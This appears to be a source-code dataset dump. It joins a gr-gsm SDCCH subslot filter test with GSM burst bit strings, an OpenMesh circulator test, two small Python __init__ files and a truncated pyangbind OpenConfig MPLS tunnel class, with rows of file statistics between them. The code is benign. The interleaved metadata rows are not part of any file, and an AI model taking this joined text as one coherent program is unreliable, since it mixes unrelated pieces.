'0001101000100010100001101100100101011100111000001101001010100010011101011000001001110100011100101100000010110101011011100111111011111101100000011000',
'0001010110101101110000011111101100001000001001110101100000011010001111011010001000111100000100110001111110110111010101011011011100111000101111010000',
'0000010000111000010001010010111110000100011000000101110110001000110101110010000011010111001100010011100001111101000101011110100001100010010110001000',
'0000011110101100001001101000001010010100100111101101101000110101001111101100010100111111011001110000011000100001010011100000001100010110101001001000',
'0001110111101011100000001011111101100110110001001100101111110010000111011101001000011101110010001111000010011110001101101111101011100001001100100000',
'0001111110100011001100101111001001101000101110011100011000100001001011100001000100101110000110110010111111110101000110001011010110011010100011001000',
'0001011100010110000001011011001100000101010000011010001000111111011110001001011101111001101111000011111110011001000010000011000101100011111001010000',
'0001110111001111101101110111110000001110111011011100110110001001001011100001000100101110100101001001000110101110111110100110100100111111011001011000',
'0001011111010100110010101100011000100011000011111000111100010101001111101100010100111111100110001110010110001110000101110000100101010111100100111000',
'0001000100110100001010000101011001010000001111001110011010001001001011100001000100101111100011000100111100100010111001010010110100010000110000110000',
'0001001100101001010111000101000101000000111101011111000001011010001111011010001000111100110110011000000011010000100110111101110011110011000011010000',
'0001011010100110110011000101111111010011110001101000011100101000110101110010000011010110110100000111011101000001101010100001110111001011010101111000',
'0000101010001100010011010101011110010101101110011110100110001010001111011010001000111100000010011011100001010001001111111100011111000011001010011000',
'0000111001011100101100111001010101000101010111011110111101010001001011100001000100101111100010100101111011000101100000101111000101011110011111100000',
'0000010101101111011001100001011100100101001000110111010110001111011110001001011101111000011010010010101111010000110000011001101011100000111110000000',
'0001000001011000010001000100100111110011001101111100010011110010011101011000001001110100110100101101100011010111101110110010101101001110001101010000',
'0000101000011101110011111001010011111001001010010000101110010001011011101111000100101111011111110000000100000110011001000100110000111001100000011000',
'0000100101010011010110101001100100110001011010111110110100011101001111101100010100111110111000110110100011001010110011000111011111110011001011100000',
'0001000110100001111010110101011111001000011100001111010110001001011011101111000100101111100001011001100110011001110101100001000001011011111110100000',
'0001011010100110001000100000001110010000011000111001001110000001001011100001000100101110011011011001000111101010001010111001101100000100001101001000',
'0000001010000101101010000000110000010101111011100110101000110111011110001001011101111001100011100100100100100000010010001111101111110011000001011000',
'0000000111000111010110000000001001101110001001001101100110010001011011101111000100101111101011111100101001110100101000011100111001001101101011101000',
'0000100100010111010011100110101011011010001011011011011101110010001111011010001000111100000110010111001010011100000011111100111000100100101010110000',
'0000101111000000100110100001011000000011111111010101010011011010000111011101001000011101110010101101000100100000001100001000100111001010010000111000',
'0000001001001101110111111011010011000011100001100011110011010001001011100001000100101110011100000010010111101100101011011111101011000000001100101000',
'0001100111010111011000100111110000111010111001011100011111000000110101110010000011010111001000000010000010011010111001111001011011011111110101011000',
'0000100010110111011001100110110010101011011110101001010001000001011011101111000100101111010101100010101110101111111011101000010111001111000101001000',
'0001110000101111100101001101001111101011000000011011000101111000110101110010000011010111111100111011111000000001010111001100110100100011010000011000',
'0000011000101001110100000000110101011101011010001101110110111001011011101111000100101111110110101011110110100111000000000011110011101000011000001000',
'0000101001000100101010001110110111010000011011001011101010010111011110001001011101111001111010110101100100101001111000100000010001000110000000110000',
'0000000111100101111111000110011101000110010110001110100101110001011011101111000100101110100010010011100010010001110100010101101101100111100110101000',
'0001000011111010000000011010011001010010011111000011110111010010001111011010001000111101101110111000011010001010100111011000001000110000101000000000',
'0001101000110010011001001110101101111110000111001101100110011001001011100001000100101110000101000111011001110001100011011101101000101001001001101000',
'0001100111010000101101001110010001001001011000011000001011001010011101011000001001110101101110110101111101110010010010000001000100011111010100011000',
'0001001101011001110000101110011110100001001000001111000100001001001011100001000100101110100010110100111010110010011000100111000100111111011000101000',
'0001001101010000111101110111111011000100101011011001110001001010011101011000001001110101000000011110001101001010110001100011000110100010011010000000',
'0000100100011000011010111010110001000101111010001001010110100001011011101111000100101111100001000101011111111110000011111111100110100100110000111000',
'0001011101111100011001100110010001000101100001001001000010110001011011101111000100101110101100111111101111111001110110100101000011100110000001011000',
'0001101000100100101011000001001101111011100110101010001110100010000111011101001000011101101101011111110001110001010000001111100110111101101000100000',
'0000010101011110000000010011100010101011101111011001100111001010001111011010001000111100010001101011101000101100010110100100001101010110010111000000',
'0001100011011000111011100010111111000000011111101010000010110001011011101111000100101111010100100110010000001010100011100001111011110010001011001000',
'0001001011000011010010000001001110110110010101010011000101001000110101110010000011010111010010011000110011000110000101111000010100001000011111111000',
'0000010100100110100110001010001011011000110000101011000001110001001011100001000100101111101010000111110111011010101010001100101100010100001000010000',
'0001101100111011110100000010111000000110111101001110111110111010011101011000001001110101011110110010010011001011001110101001101010101001011000010000',
'0001100011110111001100101110010110000110101101101111101101111001011011101111000100101111110001100010010000011100010000011011100010100111101001110000',
'0001010011010010101001001000100111111010011101011001110110010001011011101111000100101111111010111010010001100100101100011000100110011001101101000000',
'0000111011001001001100100100100101011111011100110101011100010010011101011000001001110101010100111100111001000001100010100111100001010011111111111000',
'0001100101110101101110111111000100110000001111010000100001011101001111101100010100111110111111110111000010011100101001111011010100001010001010001000',
'0000001000011111101111110000000000001100011111011010111010000111011110001001011101111001001100000001010100111111011000000110010111101001110010011000',
'0000100000011100011111001001001000001000100010010111101011101010011101011000001001110100000000010010011001110100101111001110111111010000010001000000',
'0001000101001011001111111101010111110010010110111111110000010001011011101111000100101111000100010000111110011101000001111100001001100100011100011000',
'0001101101101010110000001001110111001001000001110110110000110001001011100001000100101111100001110001000000110101100001111111001001111001101101100000',
'0000110011100000100000000010100100011001001000110010110101111001001011100001000100101110000111001100111111110011011001000001001000001111001101001000',
'0001001111100001110110001010100011100011110011100001010100001001001011100001000100101111001000101100111101001010111000010111101000000001101100101000',
'0000101001000010000001100001000011001010100011110111101110111001001011100001000100101110001010100101111010111000000010111011000010011001101000001000',
'0001101000000100110100110001010111010111111001101110110101100111011110001001011101111001000110010011100100000100011101110110111010001001000111101000',
'0000100000100110011100101001110010011011100010101101111001110010001111011010001000111101100000111011110010010111001100100010000101111111011101110000',
'0000100111111010101000001110100011010010010010100001011010110000110101110010000011010110011000111000111111000100001010010000011011001000011100110000',
'0001110110111100101101010011111100101100100100110001110110111001001011100001000100101110010111011011100001001010010100010101110100011111010101001000',
'0000111001001000110010011110000010011101000001010111011011111010011101011000001001110101011101101100101110010111010001100100000011100100111101010000',
'0001000001010011101010101011111100010010101110100001000111110010011101011000001001110101100000100101011101111101101101111000001101101010001000101000',
'0001101000001011010011001010011010100110010100011010101101011010000111011101001000011101100010011011111111101011100110000011110110001111000101101000',
'0000001010101101011001000000001000001001110100000111000000101001001011100001000100101110111111011101110101010011001110111111101001011010110000101000',
'0001011110101111110100110010010110011100111010011001001110011111011110001001011101111000101010001111000111000101111000100011100010100010010100010000',
'0001000001011110010010100001100010111111000111001111010101011111011110001001011101111001010010100101110110111111001111110010111100111010110011110000',
'0001111100100010101100010111000000011011001111001101101001000010001111011010001000111101111000000101111001110101101001101010001110100111101011001000',
'0000000011001001101001100111101011001011000100101100101001100010001111011010001000111101100100101001010100111000010001011000100110010101010111000000',
'0001111000011111011100011010110000000010000000100000111000100010011101011000001001110100011101011101001001000111011101100001011010101000011011011000',
'0001011000010101011100101011111010110101011110011011001011010010001111011010001000111100110111000110100100001100110100000001100100100111101010011000',
'0001010101101101101001011100101001110000100101011110100011100010011101011000001001110100111100001000000111000001111100011011101000101100111100111000',
'0000010101001010001110001001101101011011000110011011110111111000110101110010000011010110000000110010100100111001010110110011011101011001110100100000',
'0001111111000101100000111010111010011010011110110010111000010101001111101100010100111110000110010011101101011111001000010001111111000111001111011000',
'0000100101100011001010101100011110000111001110010010010000100001011011101111000100101110001111010000001000001101011010110101010111011011001101101000',
'0000110000111101100001011100100011101011011000111100001000000111011110001001011101111000111000000111100100101000000101100011011001111100110011110000',
'0000011001111001100111110110110000001111110101011110100011010010011101011000001001110101001101110111111100001001000101101101100110001111101011010000',
'0000100001011010001010000101110000111100011110110010000010101000110101110010000011010111010001010101111111111101101100110101111010110100001110101000',
'0000000111101000111001101101110011001100100000101111001011001111011110001001011101111001010011110001010010000011001100100001011001111010101011011000'
]
# 102 sequential framenumbers
framenumbers_input = [879852, 879853, 879854, 879855, 879856, 879857, 879858, 879859, 879860, 879861, 879862, 879863, 879864, 879865, 879866, 879867, 879868, 879869, 879870, 879871, 879872, 879873, 879874, 879875, 879876, 879877, 879878, 879879, 879880, 879881, 879882, 879883, 879884, 879885, 879886, 879887, 879888, 879889, 879890, 879891, 879892, 879893, 879894, 879895, 879896, 879897, 879898, 879899, 879900, 879901, 879902, 879903, 879904, 879905, 879906, 879907, 879908, 879909, 879910, 879911, 879912, 879913, 879914, 879915, 879916, 879917, 879918, 879919, 879920, 879921, 879922, 879923, 879924, 879925, 879926, 879927, 879928, 879929, 879930, 879931, 879932, 879933, 879934, 879935, 879936, 879937, 879938, 879939, 879940, 879941, 879942, 879943, 879944, 879945, 879946, 879947, 879948, 879949, 879950, 879951, 879952, 879953]
timeslots_input = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_001_sdcch8 (self):
bursts_expected = [
'0000011011010111011111101100010100110110000001100011100001010001011011101111000100101110001110000011001100100101111000001010000101010000110101110000',
'0000111100110111001011010100010010110100101010000000010001110010011101011000001001110100001010011111111111001010111010111010001111111101111110101000',
'0000111101101110011111010100010100110001101110001001111100100101001111101100010100111111100010010001001100000000111010001000100011010000110111110000',
'0000011100010011111011011001110010011000001111111110101000100000110101110010000011010111101011000100101011000011011011110000010001100110011010001000',
'0001000001011000010001000100100111110011001101111100010011110010011101011000001001110100110100101101100011010111101110110010101101001110001101010000',
'0000101000011101110011111001010011111001001010010000101110010001011011101111000100101111011111110000000100000110011001000100110000111001100000011000',
'0000100101010011010110101001100100110001011010111110110100011101001111101100010100111110111000110110100011001010110011000111011111110011001011100000',
'0001000110100001111010110101011111001000011100001111010110001001011011101111000100101111100001011001100110011001110101100001000001011011111110100000',
'0001001101011001110000101110011110100001001000001111000100001001001011100001000100101110100010110100111010110010011000100111000100111111011000101000',
'0001001101010000111101110111111011000100101011011001110001001010011101011000001001110101000000011110001101001010110001100011000110100010011010000000',
'0000100100011000011010111010110001000101111010001001010110100001011011101111000100101111100001000101011111111110000011111111100110100100110000111000',
'0001011101111100011001100110010001000101100001001001000010110001011011101111000100101110101100111111101111111001110110100101000011100110000001011000',
]
subslot = 2
src = grgsm.burst_source(self.framenumbers_input, self.timeslots_input, self.bursts_input)
ss_filter = grgsm.burst_sdcch_subslot_filter(grgsm.SS_FILTER_SDCCH8, subslot)
sink = grgsm.burst_sink()
self.tb.msg_connect(src, "out", ss_filter, "in")
self.tb.msg_connect(ss_filter, "out", sink, "in")
self.tb.run ()
bursts_result = list(sink.get_burst_data())
self.assertEqual(bursts_expected, bursts_result)
def test_002_sdcch4 (self):
bursts_expected = [
'0001110111001111101101110111110000001110111011011100110110001001001011100001000100101110100101001001000110101110111110100110100100111111011001011000',
'0001011111010100110010101100011000100011000011111000111100010101001111101100010100111111100110001110010110001110000101110000100101010111100100111000',
'0001000100110100001010000101011001010000001111001110011010001001001011100001000100101111100011000100111100100010111001010010110100010000110000110000',
'0001001100101001010111000101000101000000111101011111000001011010001111011010001000111100110110011000000011010000100110111101110011110011000011010000',
'0001110110111100101101010011111100101100100100110001110110111001001011100001000100101110010111011011100001001010010100010101110100011111010101001000',
'0000111001001000110010011110000010011101000001010111011011111010011101011000001001110101011101101100101110010111010001100100000011100100111101010000',
'0001000001010011101010101011111100010010101110100001000111110010011101011000001001110101100000100101011101111101101101111000001101101010001000101000',
'0001101000001011010011001010011010100110010100011010101101011010000111011101001000011101100010011011111111101011100110000011110110001111000101101000',
'0001011000010101011100101011111010110101011110011011001011010010001111011010001000111100110111000110100100001100110100000001100100100111101010011000',
'0001010101101101101001011100101001110000100101011110100011100010011101011000001001110100111100001000000111000001111100011011101000101100111100111000',
'0000010101001010001110001001101101011011000110011011110111111000110101110010000011010110000000110010100100111001010110110011011101011001110100100000',
'0001111111000101100000111010111010011010011110110010111000010101001111101100010100111110000110010011101101011111001000010001111111000111001111011000',
]
subslot = 2
src = grgsm.burst_source(self.framenumbers_input, self.timeslots_input, self.bursts_input)
splitter = grgsm.burst_sdcch_subslot_filter(grgsm.SS_FILTER_SDCCH4, subslot)
sink = grgsm.burst_sink()
self.tb.msg_connect(src, "out", splitter, "in")
self.tb.msg_connect(splitter, "out", sink, "in")
self.tb.run ()
bursts_result = list(sink.get_burst_data())
self.assertEqual(bursts_result, bursts_expected)
if __name__ == '__main__':
gr_unittest.run(qa_burst_sdcch_subslot_filter, "qa_burst_sdcch_subslot_filter.xml")
| 112.575472 | 841 | 0.881254 | 665 | 23,866 | 31.521805 | 0.518797 | 0.009636 | 0.014312 | 0.018891 | 0.036972 | 0.030436 | 0.027765 | 0.027765 | 0.023853 | 0.023853 | 0 | 0.887836 | 0.084765 | 23,866 | 211 | 842 | 113.109005 | 0.071831 | 0.034819 | 0 | 0.368098 | 0 | 0 | 0.813046 | 0.811829 | 0 | 1 | 0 | 0 | 0.01227 | 1 | 0.02454 | false | 0 | 0.01227 | 0 | 0.06135 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
821c25e1bc6f3cec5b5c196878b8d8b6937d0ac0 | 40 | py | Python | __init__.py | megbedell/plot_tools | 4056c55d23dfb80bbdd941a05bd936907903a443 | [
"MIT"
] | 1 | 2020-05-14T18:59:53.000Z | 2020-05-14T18:59:53.000Z | __init__.py | megbedell/plot_tools | 4056c55d23dfb80bbdd941a05bd936907903a443 | [
"MIT"
] | null | null | null | __init__.py | megbedell/plot_tools | 4056c55d23dfb80bbdd941a05bd936907903a443 | [
"MIT"
] | null | null | null | from .error_ellipse import error_ellipse | 40 | 40 | 0.9 | 6 | 40 | 5.666667 | 0.666667 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 40 | 1 | 40 | 40 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8232c0cefb741f739f571efb0c8d9d6401e7fad7 | 8,876 | py | Python | src/Python/Unittests/test_trimesh_circulator_current_halfedge_handle_replacement.py | rzoller/OpenMesh | f84bca0b26c61eab5f9335b2191962ca8545c5f6 | [
"BSD-3-Clause"
] | 19 | 2020-08-13T05:15:09.000Z | 2022-03-31T14:51:29.000Z | src/Python/Unittests/test_trimesh_circulator_current_halfedge_handle_replacement.py | ccopsey/OpenMesh | 93e6e626c3f282bf4275521c33cd8da1ca559c7d | [
"BSD-3-Clause"
] | 2 | 2020-09-08T07:03:04.000Z | 2021-08-04T05:43:27.000Z | src/Python/Unittests/test_trimesh_circulator_current_halfedge_handle_replacement.py | ccopsey/OpenMesh | 93e6e626c3f282bf4275521c33cd8da1ca559c7d | [
"BSD-3-Clause"
] | 10 | 2020-08-06T02:37:46.000Z | 2021-07-01T09:12:06.000Z | import unittest
import openmesh
class TrimeshCirculatorCurrentHalfedgeHandleReplacement(unittest.TestCase):
def setUp(self):
self.mesh = openmesh.TriMesh()
self.vhandle = []
def test_dereference(self):
# Add some vertices
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(1, 0, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, -1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, -1, 0)))
# Add four faces
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[2])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[1])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
# Test setup:
# 0 ==== 2
# |\ 0 /|
# | \ / |
# |2 1 3|
# | / \ |
# |/ 1 \|
# 3 ==== 4
# Starting vertex is 1->4
# output from fh_it.current_halfedge_handle()
current_halfedge_handles = [4, 0, 2, 10, 6, 8, 1, 12, 7, 14, 3, 11]
i = 0
for f in self.mesh.faces():
for he in self.mesh.fh(f):
self.assertEqual(he.idx(), current_halfedge_handles[i])
i += 1
def test_vv_iter(self):
# Add some vertices
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(1, 0, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, -1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, -1, 0)))
# Add four faces
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[2])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[1])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
# Test setup:
# 0 ==== 2
# |\ 0 /|
# | \ / |
# |2 1 3|
# | / \ |
# |/ 1 \|
# 3 ==== 4
# Starting vertex is 1->4
# output from vv_it.current_halfedge_handle()
current_halfedge_handles = [5, 0, 12, 11, 6, 1, 2, 15, 3, 4, 13, 7, 8, 9, 10, 14]
eh0 = []
eh1 = []
i = 0
for v in self.mesh.vertices():
for vv in self.mesh.vv(v):
he = openmesh.HalfedgeHandle(current_halfedge_handles[i])
eh0.append(self.mesh.edge_handle(he))
i += 1
for v in self.mesh.vertices():
for he in self.mesh.voh(v):
eh1.append(self.mesh.edge_handle(he))
self.assertEqual(len(eh0), len(eh1))
for i in range(len(eh0)):
self.assertEqual(eh0[i], eh1[i])
def test_fe_iter(self):
# Add some vertices
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(1, 0, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, -1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, -1, 0)))
# Add four faces
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[2])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[1])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
# Test setup:
# 0 ==== 2
# |\ 0 /|
# | \ / |
# |2 1 3|
# | / \ |
# |/ 1 \|
# 3 ==== 4
# Starting vertex is 1->4
# output from fe_it.current_halfedge_handle()
current_halfedge_handles = [4, 0, 2, 10, 6, 8, 1, 12, 7, 14, 3, 11]
heh0 = []
heh1 = []
i = 0
for f in self.mesh.faces():
for e in self.mesh.fe(f):
heh0.append(openmesh.HalfedgeHandle(current_halfedge_handles[i]))
i += 1
for f in self.mesh.faces():
for he in self.mesh.fh(f):
heh1.append(he)
self.assertEqual(len(heh0), len(heh1))
for i in range(len(heh0)):
self.assertEqual(heh0[i], heh1[i])
def test_vf_iter_boundary(self):
# Add some vertices
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(0, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(1, 0, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(3, 0, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(4, 1, 0)))
self.vhandle.append(self.mesh.add_vertex(openmesh.Vec3d(2, -1, 0)))
# Add three faces
face_vhandles = []
face_vhandles.append(self.vhandle[0])
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[2])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[2])
face_vhandles.append(self.vhandle[3])
face_vhandles.append(self.vhandle[4])
self.mesh.add_face(face_vhandles)
face_vhandles = []
face_vhandles.append(self.vhandle[1])
face_vhandles.append(self.vhandle[5])
face_vhandles.append(self.vhandle[3])
self.mesh.add_face(face_vhandles)
# Test setup:
#
# 0 ------ 2 ------ 4
# \ / \ /
# \ 0 / \ 1 /
# \ / \ /
# 1 ------- 3
# \ /
# \ 2 /
# \ /
# \ /
# 5
# output from fe_it.current_halfedge_handle()
current_halfedge_handles = [0, 2, 12, 4, 6, 8, 16, 10, 14]
fh0 = []
fh1 = []
i = 0
for v in self.mesh.vertices():
for f in self.mesh.vf(v):
he = openmesh.HalfedgeHandle(current_halfedge_handles[i])
fh0.append(self.mesh.face_handle(he))
i += 1
for v in self.mesh.vertices():
for f in self.mesh.vf(v):
fh1.append(f)
self.assertEqual(len(fh0), len(fh1))
for i in range(len(fh0)):
self.assertEqual(fh0[i], fh1[i])
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TrimeshCirculatorCurrentHalfedgeHandleReplacement)
unittest.TextTestRunner(verbosity=2).run(suite)
| 32.874074 | 106 | 0.546755 | 1,089 | 8,876 | 4.311295 | 0.078972 | 0.191693 | 0.172524 | 0.210863 | 0.852396 | 0.840895 | 0.809798 | 0.800213 | 0.779979 | 0.768264 | 0 | 0.045507 | 0.321654 | 8,876 | 269 | 107 | 32.996283 | 0.734263 | 0.089342 | 0 | 0.72956 | 0 | 0 | 0.000996 | 0 | 0 | 0 | 0 | 0 | 0.044025 | 1 | 0.031447 | false | 0 | 0.012579 | 0 | 0.050314 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
68cb957d09cafd69ecbb62a548b1effd57979402 | 129 | py | Python | arxiv/base/agent.py | ibnesayeed/arxiv-base | 9f49302370272792a0afc78debd039d249844c6c | [
"MIT"
] | 23 | 2019-01-10T22:01:18.000Z | 2022-02-02T10:28:25.000Z | arxiv/base/agent.py | ibnesayeed/arxiv-base | 9f49302370272792a0afc78debd039d249844c6c | [
"MIT"
] | 57 | 2018-12-17T16:45:38.000Z | 2021-12-14T14:20:58.000Z | arxiv/base/agent.py | cul-it/arxiv-base-ui | a5beadf44c24f72e21313299bfafc1ffb9d28ac7 | [
"MIT"
] | 5 | 2019-01-10T22:01:28.000Z | 2021-11-05T12:25:31.000Z | """Access to :mod:`arxiv.integration.kinesis.consumer` for backward compat."""
from arxiv.integration.kinesis.consumer import *
| 32.25 | 78 | 0.775194 | 16 | 129 | 6.25 | 0.75 | 0.32 | 0.46 | 0.62 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085271 | 129 | 3 | 79 | 43 | 0.847458 | 0.55814 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
ec0191add8d9f38798393a31b59a851ccb5a9dd8 | 109 | py | Python | html_writer/__init__.py | KKawamura1/html-writer | 8b1b9c56b755b76b632e2e0516bbae1148c8d54d | [
"MIT"
] | 1 | 2018-10-24T12:56:15.000Z | 2018-10-24T12:56:15.000Z | html_writer/__init__.py | KKawamura1/html-writer | 8b1b9c56b755b76b632e2e0516bbae1148c8d54d | [
"MIT"
] | null | null | null | html_writer/__init__.py | KKawamura1/html-writer | 8b1b9c56b755b76b632e2e0516bbae1148c8d54d | [
"MIT"
] | null | null | null | from html_writer.html_writer import Html, Indent, WriteOutError
from html_writer._version import __version__
| 36.333333 | 63 | 0.87156 | 15 | 109 | 5.8 | 0.466667 | 0.344828 | 0.321839 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091743 | 109 | 2 | 64 | 54.5 | 0.878788 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
ec1a622ad9e7af7074e73897225095e9f20ebc3f | 212,325 | py | Python | napalm_yang/models/openconfig/network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | [
"Apache-2.0"
] | 64 | 2016-10-20T15:47:18.000Z | 2021-11-11T11:57:32.000Z | napalm_yang/models/openconfig/network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | [
"Apache-2.0"
] | 126 | 2016-10-05T10:36:14.000Z | 2019-05-15T08:43:23.000Z | napalm_yang/models/openconfig/network_instances/network_instance/mpls/lsps/constrained_path/tunnels/tunnel/config/__init__.py | ckishimo/napalm-yang | 8f2bd907bd3afcde3c2f8e985192de74748baf6c | [
"Apache-2.0"
] | 63 | 2016-11-07T15:23:08.000Z | 2021-09-22T14:41:16.000Z | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/mpls/lsps/constrained-path/tunnels/tunnel/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configuration parameters related to TE tunnels:
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__name",
"__type",
"__signaling_protocol",
"__description",
"__admin_status",
"__preference",
"__metric_type",
"__metric",
"__shortcut_eligible",
"__protection_style_requested",
"__reoptimize_timer",
"__source",
"__soft_preemption",
"__setup_priority",
"__hold_priority",
)
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__name = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="name",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
